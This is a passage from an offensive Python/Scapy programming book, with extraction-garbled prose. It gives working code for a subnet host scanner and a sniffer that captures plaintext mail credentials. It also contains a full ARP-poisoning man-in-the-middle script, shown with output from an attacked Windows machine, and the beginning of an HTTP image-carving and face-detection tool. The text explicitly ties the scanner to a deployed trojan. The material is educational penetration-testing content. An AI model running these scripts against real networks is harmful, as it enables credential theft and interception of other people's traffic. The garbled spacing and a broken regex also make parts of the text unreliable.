subnet = "192.168.0.0/24"
# magic string we'll check ICMP responses for
➊ magic_message = "PYTHONRULES!"
# this sprays out the UDP datagrams
➋ def udp_sender(subnet,magic_message):
time.sleep(5)
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for ip in IPNetwork(subnet):
try:
sender.sendto(magic_message,("%s" % ip,65212))
except:
pass
--
snip
--

# start sending packets
➌ t = threading.Thread(target=udp_sender,args=(subnet,magic_message))

t.start()

--
snip
--
try:
while True:
--
snip
--
#print "ICMP -> Type: %d Code: %d" % (icmp_header.type, icmp_header.
code)
# now check for the TYPE 3 and CODE
if icmp_header.code == 3 and icmp_header.type == 3:
# make sure host is in our target subnet
➍ if IPAddress(ip_header.src_address) in IPNetwork(subnet):
# make sure it has our magic message
➎ if raw_buffer[len(raw_buffer)-len(magic_message):] ==
magic_message:
print "Host Up: %s" % ip_header.src_address
This l a st b it o f c o de s h o uld b e f a ir ly s tr a ig htf o rw ard to u nd ers ta nd . W e d efin e a s im ple s tr in g
sig natu re
➊ s o th at w e c an te st th at th e r e sp onse s a re c o m in g f r o m U D P p ackets th at w e s e nt
orig in ally . O ur
udp_sender
f u ncti o n
➋ s im ply ta kes i n a s u b net th at w e s p ecify a t th e to p o f o ur
sc rip t, i te ra te s th ro ugh a ll I P a d dre sse s i n th at s u b net, a nd f ir e s U D P d ata gra m s a t th em . I n th e m ain
body o f o ur s c rip t, j u st b efo re th e m ain p acket d eco din g l o op, w e s p aw n
udp_sender
i n a s e p ara te
th re ad
➌ to e nsu re th at w e a re n’t i n te rfe rin g w ith o ur a b ility to s n iff r e sp onse s. I f w e d ete ct th e
anti c ip ate d I C M P m essa ge, w e f ir s t c heck to m ake s u re th at th e I C M P r e sp onse i s c o m in g f r o m w ith in
our ta rg et s u b net
➍ . W e th en p erfo rm o ur f in al c heck o f m akin g s u re th at th e I C M P r e sp onse h as o ur
magic s tr in g i n i t
➎ . I f a ll o f th ese c hecks p ass, w e p rin t o ut th e s o urc e I P a d dre ss o f w here th e I C M P
messa ge o rig in ate d . L et’ s tr y i t o ut.

Kic k in g t h e T ir e s
Now l e t’ s ta ke o ur s c anner a nd r u n i t a gain st th e l o cal n etw ork . Y ou c an u se L in ux o r W in d ow s f o r
th is a s th e r e su lts w ill b e th e s a m e. I n m y c ase , th e I P a d dre ss o f th e l o cal m achin e I w as o n w as
192.168.0.187
, s o I s e t m y s c anner to h it
192.168.0.0/24
. I f th e o utp ut i s to o n o is y w hen y o u r u n
yo ur s c anner, s im ply c o m ment o ut a ll p rin t s ta te m ents e xcep t f o r th e l a st o ne th at te lls y o u w hat h o sts
are r e sp ond in g.
TH E N ETA DDR M ODULE
Our s c anner is g oin g to u se a th ir d -p arty lib ra ry c alle d
netaddr
, w hic h w ill a llo w u s to f e ed in a s u bnet m ask s u ch a s 1 92.1 68.0 .0 /2 4
and h ave o ur s c anner h andle it a ppro pria te ly . D ow nlo ad th e lib ra ry f ro m h ere :
http ://c o de.g oogle .c o m /p /n eta ddr/d ow nlo ads/lis t
Or, if y ou in sta lle d th e P yth on s e tu p to ols p ackage in
Chapte r 1
, y ou c an s im ply e xecute th e f o llo w in g f ro m a c om mand p ro m pt:
easy_install netaddr
The
netaddr
m odule m akes it v ery e asy to w ork w it h s u bnets a nd a ddre ssin g . F or e xam ple , y ou c an r u n s im ple te sts lik e th e
fo llo w in g u sin g th e
IPNetwork
o bje ct:
ip_address = "192.168.112.3"
if ip_address in IPNetwork("192.168.112.0/24"):
print True
Or y ou c an c re ate s im ple it e ra to rs if y ou w ant to s e nd p ackets to a n e ntir e n etw ork :
for ip in IPNetwork("192.168.112.1/24"):
s = socket.socket()
s.connect((ip, 25))
# send mail packets
This w ill g re atly s im plif y y our p ro gra m min g lif e w hen d ealin g w it h e ntir e n etw ork s a t a tim e, a nd it is id eally s u it e d f o r o ur h ost
dis c overy to ol . A fte r it ’s in sta lle d, y ou a re r e ady to p ro ceed.
c:\Python27\python.exe scanner.py
Host Up: 192.168.0.1
Host Up: 192.168.0.190
Host Up: 192.168.0.192
Host Up: 192.168.0.195
For a q uic k s c an l ik e th e o ne I p erfo rm ed , i t o nly to ok a f e w s e co nd s to g et th e r e su lts b ack. B y c ro ss-
re fe re ncin g th ese I P a d dre sse s w ith th e D HCP ta b le i n m y h o m e r o ute r, I w as a b le to v erify th at th e
re su lts w ere a ccura te . Y ou c an e asily e xp and w hat y o u’v e l e arn ed i n th is c hap te r to d eco de T C P a nd
UD P p ackets , a nd b uild a d diti o nal to olin g a ro und i t. T his s c anner i s a ls o u se fu l f o r th e tr o ja n
fr a m ew ork w e w ill b egin b uild in g i n
Chap te r 7
. T his w ould a llo w a d ep lo yed tr o ja n to s c an th e l o cal
netw ork l o okin g f o r a d diti o nal ta rg ets . N ow th at w e h av e th e b asic s d ow n o f h o w n etw ork s w ork o n
a h ig h a nd l o w l e v el, l e t’ s e xp lo re a v ery m atu re P yth o n l ib ra ry c alle d S cap y.
[ 7 ]
An
in put/o utp ut c o ntr o l ( IO CTL)
is a m eans f o r u se rs p ace p ro gra m s to c om munic ate w it h k ern el m ode c om ponents . H ave a r e ad
here :
http ://e n .w ik ip ed ia .o rg /w ik i/I o ctl
.

Chap te r 4 . O wnin g t h e N etw ork w it h S ca p y
Occasio nally , y o u r u n i n to s u ch a w ell th o ught- o ut, a m azin g P yth o n l ib ra ry th at d ed ic ati n g a w ho le
chap te r to i t c an’t d o i t j u sti c e. P hilip pe B io nd i h as c re ate d s u ch a l ib ra ry i n th e p acket m anip ula ti o n
lib ra ry S cap y. Y ou j u st m ig ht f in is h th is c hap te r a nd r e aliz e th at I m ad e y o u d o a l o t o f w ork i n th e
pre v io us tw o c hap te rs th at y o u c o uld h av e d one w ith j u st o ne o r tw o l in es o f S cap y. S cap y i s
pow erfu l a nd f le xib le , a nd th e p ossib iliti e s a re a lm ost i n fin ite . W e’ll g et a ta ste o f th in gs b y s n iffin g
to s te al p la in te xt e m ail c re d enti a ls a nd th en A RP p ois o nin g a ta rg et m achin e o n o ur n etw ork s o th at
we c an s n iff th eir tr a ffic . W e’ll w ra p th in gs u p b y d em onstr a ti n g h o w S cap y’s P C A P p ro cessin g c an
be e xte nd ed to c arv e o ut i m ages f r o m H TTP tr a ffic a nd th en p erfo rm f a cia l d ete cti o n o n th em to
dete rm in e i f th ere a re h um ans p re se nt i n th e i m ages.
I r e co m mend th at y o u u se S cap y u nd er a L in ux s y ste m , a s i t w as d esig ned to w ork w ith L in ux i n m in d .
The n ew est v ers io n o f S cap y d oes s u p port W in d ow s,
[ 8 ]
b ut f o r th e p urp ose o f th is c hap te r I w ill
assu m e y o u a re u sin g y o ur K ali V M th at h as a f u lly f u ncti o nin g S cap y i n sta lla ti o n. I f y o u d on’t h av e
Scap y, h ead o n o ver to
http ://w ww.s e cd ev.o rg /p ro je cts /s c a py/
to i n sta ll i t.

Ste a lin g E m ail C re d en tia ls
You h av e a lr e ad y s p ent s o m e ti m e g etti n g i n to th e n uts a nd b olts o f s n iffin g i n P yth o n. S o l e t’ s g et to
kno w S cap y’s i n te rfa ce f o r s n iffin g p ackets a nd d is se cti n g th eir c o nte nts . W e a re g o in g to b uild a v ery
sim ple s n iffe r to c ap tu re S M TP, P O P3, a nd I M AP c re d enti a ls . L ate r, b y c o up lin g o ur s n iffe r w ith o ur
Addre ss R eso lu ti o n P ro to co l ( A RP) p ois o nin g m an-in -th e-m id dle ( M IT M ) a tta ck, w e c an e asily s te al
cre d enti a ls f r o m o th er m achin es o n th e n etw ork . T his te chniq ue c an o f c o urs e b e a p plie d to a ny
pro to co l o r to s im ply s u ck i n a ll tr a ffic a nd s to re i t i n a P C A P f ile f o r a naly sis , w hic h w e w ill a ls o
dem onstr a te .
To g et a f e el f o r S cap y, l e t’ s s ta rt b y b uild in g a s k ele to n s n iffe r th at s im ply d is se cts a nd d um ps th e
packets o ut. T he a p tl y n am ed
sniff
f u ncti o n l o oks l ik e th e f o llo w in g:
sniff(filter="",iface="any",prn=function,count=N)
The
filter
p ara m ete r a llo w s u s to s p ecify a B PF ( W ir e sh ark -s ty le ) f ilte r to th e p ackets th at S cap y
sn iffs , w hic h c an b e l e ft b la nk to s n iff a ll p ackets . F or e xam ple , to s n iff a ll H TTP p ackets y o u w ould
use a B PF f ilte r o f
tcp port 80
. T he
iface
p ara m ete r te lls th e s n iffe r w hic h n etw ork i n te rfa ce to
sn iff o n; i f l e ft b la nk, S cap y w ill s n iff o n a ll i n te rfa ces. T he
prn
p ara m ete r s p ecifie s a c allb ack
fu ncti o n to b e c alle d f o r e v ery p acket th at m atc hes th e f ilte r, a nd th e c allb ack f u ncti o n r e ceiv es th e
packet o bje ct a s i ts s in gle p ara m ete r. T he
count
p ara m ete r s p ecifie s h o w m any p ackets y o u w ant to
sn iff; i f l e ft b la nk, S cap y w ill s n iff i n d efin ite ly .
Let’ s s ta rt b y c re ati n g a s im ple s n iffe r th at s n iffs a p acket a nd d um ps i ts c o nte nts . W e’ll th en e xp and i t
to o nly s n iff e m ail- re la te d c o m mand s. C ra ck o pen
mail_ sn iffe r.p y
a nd j a m o ut th e f o llo w in g c o de:
from scapy.all import *
# our packet callback
➊ def packet_callback(packet):
print packet.show()
# fire up our sniffer
➋ sniff(prn=packet_callback,count=1)
We s ta rt b y d efin in g o ur c allb ack f u ncti o n th at w ill r e ceiv e e ach s n iffe d p acket
➊ a nd th en s im ply te ll
Scap y to s ta rt s n iffin g
➋ o n a ll i n te rfa ces w ith n o f ilte rin g. N ow l e t’ s r u n th e s c rip t a nd y o u s h o uld
se e o utp ut s im ila r to w hat y o u s e e b elo w .
$
python2.7 mail_sniffer.py
WARNING: No route found for IPv6 destination :: (no default route?)
###[ Ethernet ]###
dst = 10:40:f3:ab:71:02
src = 00:18:e7:ff:5c:f8
type = 0x800
###[ IP ]###
version = 4L
ihl = 5L
tos = 0x0
len = 52
id = 35232
flags = DF
frag = 0L
ttl = 51
proto = tcp
chksum = 0x4a51
src = 195.91.239.8
dst = 192.168.0.198
\options \
###[ TCP ]###

sport = etlservicemgr
dport = 54000
seq = 4154787032
ack = 2619128538
dataofs = 8L
reserved = 0L
flags = A
window = 330
chksum = 0x80a2
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1960913461,
764897985))]
None
How i n cre d ib ly e asy w as th at! W e c an s e e th at w hen th e f ir s t p acket w as r e ceiv ed o n th e n etw ork , o ur
callb ack f u ncti o n u se d th e b uilt- in f u ncti o n
packet.show()
to d is p la y th e p acket c o nte nts a nd to
dis se ct s o m e o f th e p ro to co l i n fo rm ati o n. U sin g
show()
i s a g re at w ay to d eb ug s c rip ts a s y o u a re
go in g a lo ng to m ake s u re y o u a re c ap tu rin g th e o utp ut y o u w ant.
Now th at w e h av e o ur b asic s n iffe r r u nnin g, l e t’ s a p ply a f ilte r a nd a d d s o m e l o gic to o ur c allb ack
fu ncti o n to p eel o ut e m ail- re la te d a uth enti c ati o n s tr in gs.
from scapy.all import *
# our packet callback
def packet_callback(packet):
➊ if packet[TCP].payload:
mail_packet = str(packet[TCP].payload)
➋ if "user" in mail_packet.lower() or "pass" in mail_packet.lower():
print "[*] Server: %s" % packet[IP].dst
➌ print "[*] %s" % packet[TCP].payload
# fire up our sniffer
➍ sniff(filter="tcp port 110 or tcp port 25 or tcp port 143",prn=packet_
callback,store=0)
Pre tty s tr a ig htf o rw ard s tu ff h ere . W e c hanged o ur s n iff f u ncti o n to a d d a f ilte r th at o nly i n clu d es tr a ffic
desti n ed f o r th e c o m mon m ail p orts 1 1 0 ( P O P3), 1 43 ( IM AP), a nd S M TP ( 2 5)
➍ . W e a ls o u se d a
new p ara m ete r c alle d
store
, w hic h w hen s e t to 0 e nsu re s th at S cap y i s n ’t k eep in g th e p ackets i n
mem ory . I t’ s a g o od i d ea to u se th is p ara m ete r i f y o u i n te nd to l e av e a l o ng-te rm s n iffe r r u nnin g
because th en y o u w on’t b e c o nsu m in g v ast a m ounts o f R A M . W hen o ur c allb ack f u ncti o n i s c alle d ,
we c heck to m ake s u re i t h as a d ata p aylo ad
➊ a nd w heth er th e p aylo ad c o nta in s th e ty p ic al U SE R o r
PA SS m ail c o m mand s
➋ . I f w e d ete ct a n a uth enti c ati o n s tr in g, w e p rin t o ut th e s e rv er w e a re s e nd in g
it to a nd th e a ctu al d ata b yte s o f th e p acket
➌ .

Kic k in g t h e T ir e s
Here i s s o m e e xam ple o utp ut f r o m a d um my e m ail a cco unt I a tte m pte d to c o nnect m y m ail c lie nt to :
[*] Server: 25.57.168.12
[*] USER jms
[*] Server: 25.57.168.12
[*] PASS justin
[*] Server: 25.57.168.12
[*] USER jms
[*] Server: 25.57.168.12
[*] PASS test
You c an s e e th at m y m ail c lie nt i s a tte m pti n g to l o g i n to th e s e rv er a t
25.57.168.12
a nd s e nd in g th e
pla in te xt c re d enti a ls o ver th e w ir e . T his i s a r e ally s im ple e xam ple o f h o w y o u c an ta ke a S cap y
sn iffin g s c rip t a nd tu rn i t i n to a u se fu l to ol d urin g p enetr a ti o n te sts .
Sniffin g y o ur o w n tr a ffic m ig ht b e f u n, b ut i t’ s a lw ays b ette r to s n iff w ith a f r ie nd , s o l e t’ s ta ke a l o ok
at h o w y o u c an p erfo rm a n A RP p ois o nin g a tta ck to s n iff th e tr a ffic o f a ta rg et m achin e o n th e s a m e
netw ork .

ARP C ach e P ois o n in g w it h S ca p y
ARP p ois o nin g i s o ne o f th e o ld est y et m ost e ffe cti v e tr ic ks i n a h acker’s to olk it. Q uite s im ply , w e
will c o nv in ce a ta rg et m achin e th at w e h av e b eco m e i ts g ate w ay, a nd w e w ill a ls o c o nv in ce th e
gate w ay th at i n o rd er to r e ach th e ta rg et m achin e, a ll tr a ffic h as to g o th ro ugh u s. E very c o m pute r o n a
netw ork m ain ta in s a n A RP c ache th at s to re s th e m ost r e cent M AC a d dre sse s th at m atc h to I P
ad dre sse s o n th e l o cal n etw ork , a nd w e a re g o in g to p ois o n th is c ache w ith e ntr ie s th at w e c o ntr o l to
achie v e th is a tta ck. B ecause th e A ddre ss R eso lu ti o n P ro to co l a nd A RP p ois o nin g i n g enera l i s
co vere d i n n um ero us o th er m ate ria ls , I ’ ll l e av e i t to y o u to d o a ny n ecessa ry r e se arc h to u nd ers ta nd
ho w th is a tta ck w ork s a t a l o w er l e v el.
Now th at w e k no w w hat w e n eed to d o, l e t’ s p ut i t i n to p ra cti c e. W hen I te ste d th is , I a tta cked a r e al
Win d ow s m achin e a nd u se d m y K ali V M a s m y a tta ckin g m achin e. I h av e a ls o te ste d th is c o de a gain st
vario us m obile d ev ic es c o nnecte d to a w ir e le ss a ccess p oin t a nd i t w ork ed g re at. T he f ir s t th in g
we’ll d o i s c heck th e A RP c ache o n th e ta rg et W in d ow s m achin e s o w e c an s e e o ur a tta ck i n a cti o n
la te r o n. E xam in e th e f o llo w in g to s e e h o w to i n sp ect th e A RP c ache o n y o ur W in d ow s V M .
C:\Users\Clare>
ipconfig
Windows IP Configuration
Wireless LAN adapter Wireless Network Connection:
Connection-specific DNS Suffix . : gateway.pace.com
Link-local IPv6 Address . . . . . : fe80::34a0:48cd:579:a3d9%11
IPv4 Address. . . . . . . . . . . : 172.16.1.71
Subnet Mask . . . . . . . . . . . : 255.255.255.0
➊ Default Gateway . . . . . . . . . :
172.16.1.254
C:\Users\Clare>
arp -a
Interface: 172.16.1.71 --- 0xb
Internet Address Physical Address Type
➋ 172.16.1.254
3c-ea-4f-2b-41-f9
dynamic
172.16.1.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
255.255.255.255 ff-ff-ff-ff-ff-ff static
So n o w w e c an s e e th at th e g ate w ay I P a d dre ss
➊ i s a t
172.16.1.254
a nd i ts a sso cia te d A RP c ache
entr y
➋ h as a M AC a d dre ss o f
3c-ea-4f-2b-41-f9
. W e w ill ta ke n o te o f th is b ecause w e c an v ie w
th e A RP c ache w hile th e a tta ck i s o ngo in g a nd s e e th at w e h av e c hanged th e g ate w ay’s r e gis te re d
MAC a d dre ss. N ow th at w e k no w th e g ate w ay a nd o ur ta rg et I P a d dre ss, l e t’ s b egin c o din g o ur A RP
pois o nin g s c rip t. O pen a n ew P yth o n f ile , c all i t
arp er.p y
, a nd e nte r th e f o llo w in g c o de:
from scapy.all import *
import os
import sys
import threading
import signal
interface = "en1"
target_ip = "172.16.1.71"
gateway_ip = "172.16.1.254"
packet_count = 1000
# set our interface
conf.iface = interface

# turn off output
conf.verb = 0
print "[*] Setting up %s" % interface
➊ gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
➋ target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip,target_mac)
# start poison thread
➌ poison_thread = threading.Thread(target = poison_target, args =
(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
➍ packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
# write out the captured packets
➎ wrpcap('arper.pcap',packets)
# restore the network
➏ restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
except KeyboardInterrupt:
# restore the network
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
This i s th e m ain s e tu p p orti o n o f o ur a tta ck. W e s ta rt b y r e so lv in g th e g ate w ay
➊ a nd ta rg et I P

ad dre ss’s c o rre sp ond in g M AC a d dre sse s u sin g a f u ncti o n c alle d
get_mac
th at w e’ll p lu m b i n s h o rtl y .
Afte r w e h av e a cco m plis h ed th at, w e s p in u p a s e co nd th re ad to b egin th e a ctu al A RP p ois o nin g
atta ck
➌ . I n o ur m ain th re ad , w e s ta rt u p a s n iffe r
➍ th at w ill c ap tu re a p re se t a m ount o f p ackets
usin g a B PF f ilte r to o nly c ap tu re tr a ffic f o r o ur ta rg et I P a d dre ss. W hen a ll o f th e p ackets h av e b een
cap tu re d , w e w rite th em o ut
➎ to a P C A P f ile s o th at w e c an o pen th em i n W ir e sh ark o r u se o ur
up co m in g i m age c arv in g s c rip t a gain st th em . W hen th e a tta ck i s f in is h ed , w e c all o ur
restore_target
f u ncti o n
➏ , w hic h i s r e sp onsib le f o r p utti n g th e n etw ork b ack to th e w ay i t w as
befo re th e A RP p ois o nin g to ok p la ce. L et’ s a d d th e s u p porti n g f u ncti o ns n o w b y p unchin g i n th e
fo llo w in g c o de a b ove o ur p re v io us c o de b lo ck:
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
# slightly different method using send
print "[*] Restoring target..."
➊ send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
# signals the main thread to exit

➋ os.kill(os.getpid(), signal.SIGINT)
def get_mac(ip_address):
➌ responses,unanswered =
srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),
timeout=2,retry=10)
# return the MAC address from a response
for s,r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
➍ poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst= target_mac
➎ poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst= gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
➏ while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
print "[*] ARP poison attack finished."
return
So th is i s th e m eat a nd p ota to es o f th e a ctu al a tta ck. O ur
restore_target
f u ncti o n s im ply s e nd s o ut
th e a p pro pria te A RP p ackets to th e n etw ork b ro ad cast a d dre ss
➊ to r e se t th e A RP c aches o f th e
gate w ay a nd ta rg et m achin es. W e a ls o s e nd a s ig nal to th e m ain th re ad
➋ to e xit, w hic h w ill b e u se fu l
in c ase o ur p ois o nin g th re ad r u ns i n to a n i s su e o r y o u h it
CTR L
-C o n y o ur k eyb oard . O ur
get_mac
fu ncti o n i s r e sp onsib le f o r u sin g th e
srp
( s e nd a nd r e ceiv e p acket) f u ncti o n
➌ to e m it a n A RP r e q uest
to th e s p ecifie d I P a d dre ss i n o rd er to r e so lv e th e M AC a d dre ss a sso cia te d w ith i t. O ur
poison_target
f u ncti o n b uild s u p A RP r e q uests f o r p ois o nin g b oth th e ta rg et I P
➍ a nd th e g ate w ay
➎ . B y p ois o nin g b oth th e g ate w ay a nd th e ta rg et I P a d dre ss, w e c an s e e tr a ffic f lo w in g i n a nd o ut o f
th e ta rg et. W e k eep e m itti n g th ese A RP r e q uests
➏ i n a l o op to m ake s u re th at th e r e sp ecti v e A RP
cache e ntr ie s r e m ain p ois o ned f o r th e d ura ti o n o f o ur a tta ck.
Let’ s ta ke th is b ad b oy f o r a s p in !

Kic k in g t h e T ir e s
Befo re w e b egin , w e n eed to f ir s t te ll o ur l o cal h o st m achin e th at w e c an f o rw ard p ackets a lo ng to
both th e g ate w ay a nd th e ta rg et I P a d dre ss. I f y o u a re o n y o ur K ali V M , e nte r th e f o llo w in g c o m mand
in to y o ur te rm in al:
#:>
echo 1 > /proc/sys/net/ipv4/ip_forward
If y o u a re a n A pple f a nb oy, th en u se th e f o llo w in g c o m mand :
fanboy:tmp justin$
sudo sysctl -w net.inet.ip.forwarding=1
Now th at w e h av e I P f o rw ard in g i n p la ce, l e t’ s f ir e u p o ur s c rip t a nd c heck th e A RP c ache o f o ur
ta rg et m achin e. F ro m y o ur a tta ckin g m achin e, r u n th e f o llo w in g ( a s r o ot) :
fanboy:tmp justin$
sudo python2.7 arper.py
WARNING: No route found for IPv6 destination :: (no default route?)
[*] Setting up en1
[*] Gateway 172.16.1.254 is at 3c:ea:4f:2b:41:f9
[*] Target 172.16.1.71 is at 00:22:5f:ec:38:3d
[*] Beginning the ARP poison. [CTRL-C to stop]
[*] Starting sniffer for 1000 packets
Aw eso m e! N o e rro rs o r o th er w eir d ness. N ow l e t’ s v alid ate th e a tta ck o n o ur ta rg et m achin e:
C:\Users\Clare>
arp -a
Interface: 172.16.1.71 --- 0xb
Internet Address Physical Address Type
172.16.1.64 10-40-f3-ab-71-02 dynamic
172.16.1.254
10-40-f3-ab-71-02
dynamic
172.16.1.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
255.255.255.255 ff-ff-ff-ff-ff-ff static
You c an n o w s e e th at p oor C la re ( it’ s h ard b ein g m arrie d to a h acker, h ackin ’ a in ’t e asy, e tc .) n o w h as
her A RP c ache p ois o ned w here th e g ate w ay n o w h as th e s a m e M AC a d dre ss a s th e a tta ckin g
co m pute r. Y ou c an c le arly s e e i n th e e ntr y a b ove th e g ate w ay th at I ’ m a tta ckin g f r o m
172.16.1.64
.
When th e a tta ck i s f in is h ed c ap tu rin g p ackets , y o u s h o uld s e e a n
arp er.p ca p
f ile i n th e s a m e d ir e cto ry
as y o ur s c rip t. Y ou c an o f c o urs e d o th in gs s u ch a s f o rc e th e ta rg et c o m pute r to p ro xy a ll o f i ts tr a ffic
th ro ugh a l o cal i n sta nce o f B urp o r d o a ny n um ber o f o th er n asty th in gs. Y ou m ig ht w ant to h ang o n to
th at P C A P f o r th e n ext s e cti o n o n P C A P p ro cessin g — y o u n ev er k no w w hat y o u m ig ht f in d !

PC AP P ro cessin g
Wir e sh ark a nd o th er to ols l ik e N etw ork M in er a re g re at f o r i n te ra cti v ely e xp lo rin g p acket c ap tu re
file s, b ut th ere w ill b e ti m es w here y o u w ant to s lic e a nd d ic e P C A Ps u sin g P yth o n a nd S cap y. S om e
gre at u se c ase s a re g enera ti n g f u zzin g te st c ase s b ase d o n c ap tu re d n etw ork tr a ffic o r e v en s o m eth in g
as s im ple a s r e p la yin g tr a ffic th at y o u h av e p re v io usly c ap tu re d .
We a re g o in g to ta ke a s lig htl y d iffe re nt s p in o n th is a nd a tte m pt to c arv e o ut i m age f ile s f r o m H TTP
tr a ffic . W ith th ese i m age f ile s i n h and , w e w ill u se O penC V,
[ 9 ]
a c o m pute r v is io n to ol, to a tte m pt to
dete ct i m ages th at c o nta in h um an f a ces s o th at w e c an n arro w d ow n i m ages th at m ig ht b e i n te re sti n g.
We c an u se o ur p re v io us A RP p ois o nin g s c rip t to g enera te th e P C A P f ile s o r y o u c o uld e xte nd th e
ARP p ois o nin g s n iffe r to d o o n-th efly f a cia l d ete cti o n o f i m ages w hile th e ta rg et i s b ro w sin g. L et’ s
get s ta rte d b y d ro ppin g i n th e c o de n ecessa ry to p erfo rm th e P C A P a naly sis . O pen
pic _ ca rv er.p y
a nd
ente r th e f o llo w in g c o de:
import re
import zlib
import cv2
from scapy.all import *
pictures_directory = "/home/justin/pic_carver/pictures"
faces_directory = "/home/justin/pic_carver/faces"
pcap_file = "bhp.pcap"
def http_assembler(pcap_file):
carved_images = 0
faces_detected = 0
➊ a = rdpcap(pcap_file)
➋ sessions = a.sessions()
for session in sessions:
http_payload = ""
for packet in sessions[session]:
try:
if packet[TCP].dport == 80 or packet[TCP].sport == 80:
➌ # reassemble the stream
http_payload += str(packet[TCP].payload)
except:
pass
➍ headers = get_http_headers(http_payload)
if headers is None:
continue
➎ image,image_type = extract_image(headers,http_payload)
if image is not None and image_type is not None:
# store the image
➏ file_name = "%s-pic_carver_%d.%s" %
(pcap_file,carved_images,image_type)
fd = open("%s/%s" %
(pictures_directory,file_name),"wb")

fd.write(image)
fd.close()
carved_images += 1
# now attempt face detection
try:
➐ result = face_detect("%s/%s" %
(pictures_directory,file_name),file_name)
if result is True:
faces_detected += 1
except:
pass
return carved_images, faces_detected
carved_images, faces_detected = http_assembler(pcap_file)
print "Extracted: %d images" % carved_images
print "Detected: %d faces" % faces_detected
This i s th e m ain s k ele to n l o gic o f o ur e nti r e s c rip t, a nd w e w ill a d d i n th e s u p porti n g f u ncti o ns
sh o rtl y . T o s ta rt, w e o pen th e P C A P f ile f o r p ro cessin g
➊ . W e ta ke a d vanta ge o f a b eauti fu l f e atu re o f
Scap y to a uto m ati c ally s e p ara te e ach T C P s e ssio n
➋ i n to a d ic ti o nary . W e u se th at a nd f ilte r o ut o nly
HTTP tr a ffic , a nd th en c o ncate nate th e p aylo ad o f a ll o f th e H TTP tr a ffic
➌ i n to a s in gle b uffe r. T his
is e ffe cti v ely th e s a m e a s r ig ht- c lic kin g i n W ir e sh ark a nd s e le cti n g F ollo w T C P S tr e am . A fte r w e
hav e th e H TTP d ata r e asse m ble d , w e p ass i t o ff to o ur H TTP h ead er p ars in g f u ncti o n
➍ , w hic h w ill
allo w u s to i n sp ect th e H TTP h ead ers i n d iv id ually . A fte r w e v alid ate th at w e a re r e ceiv in g a n i m age
back i n a n H TTP r e sp onse , w e e xtr a ct th e r a w i m age
➎ a nd r e tu rn th e i m age ty p e a nd th e b in ary b ody
of th e i m age i ts e lf. T his i s n o t a b ulle tp ro of i m age e xtr a cti o n r o uti n e, b ut a s y o u’ll s e e, i t w ork s
am azin gly w ell. W e s to re th e e xtr a cte d i m age
➏ a nd th en p ass th e f ile p ath a lo ng to o ur f a cia l
dete cti o n r o uti n e
➐ .
Now l e t’ s c re ate th e s u p porti n g f u ncti o ns b y a d din g th e f o llo w in g c o de a b ove o ur
http_assembler
fu ncti o n.
def get_http_headers(http_payload):
try:
# split the headers off if it is HTTP traffic
headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]
# break out the headers
headers = dict(re.findall(r"(?P<'name>.*?): (?P.*?)\r\n",
headers_raw))
except:
return None
if "Content-Type" not in headers:
return None
return headers
def extract_image(headers,http_payload):
image = None
image_type = None
try:
if "image" in headers['Content-Type']:

# grab the image type and image body
image_type = headers['Content-Type'].split("/")[1]
image = http_payload[http_payload.index("\r\n\r\n")+4:]
# if we detect compression decompress the image
try:
if "Content-Encoding" in headers.keys():
if headers['Content-Encoding'] == "gzip":
image = zlib.decompress(image, 16+zlib.MAX_WBITS)
elif headers['Content-Encoding'] == "deflate":
image = zlib.decompress(image)
except:
pass
except:
return None,None
return image,image_type
These s u p porti n g f u ncti o ns h elp u s to ta ke a c lo se r l o ok a t th e H TTP d ata th at w e r e tr ie v ed f r o m o ur
PC A P f ile . T he
get_http_headers
f u ncti o n
ta kes th e r a w H TTP tr a ffic a nd s p lits o ut th e h ead ers
usin g a r e gula r e xp re ssio n. T he
extract_image
f u ncti o n ta kes th e H TTP h ead ers a nd d ete rm in es
wheth er w e r e ceiv ed a n i m age i n th e H TTP r e sp onse . I f w e d ete ct th at th e
Content-Type
h ead er
does i n d eed c o nta in th e i m age M IM E ty p e, w e s p lit o ut th e ty p e o f i m age; a nd i f th ere i s c o m pre ssio n
ap plie d to th e i m age i n tr a nsit, w e a tte m pt to d eco m pre ss i t b efo re r e tu rn in g th e i m age ty p e a nd th e
ra w i m age b uffe r. N ow l e t’ s d ro p i n o ur f a cia l d ete cti o n c o de to d ete rm in e i f th ere i s a h um an f a ce i n
any o f th e i m ages th at w e r e tr ie v ed . A dd th e f o llo w in g c o de to
pic _ ca rv er.p y
:
def face_detect(path,file_name):
➊ img = cv2.imread(path)
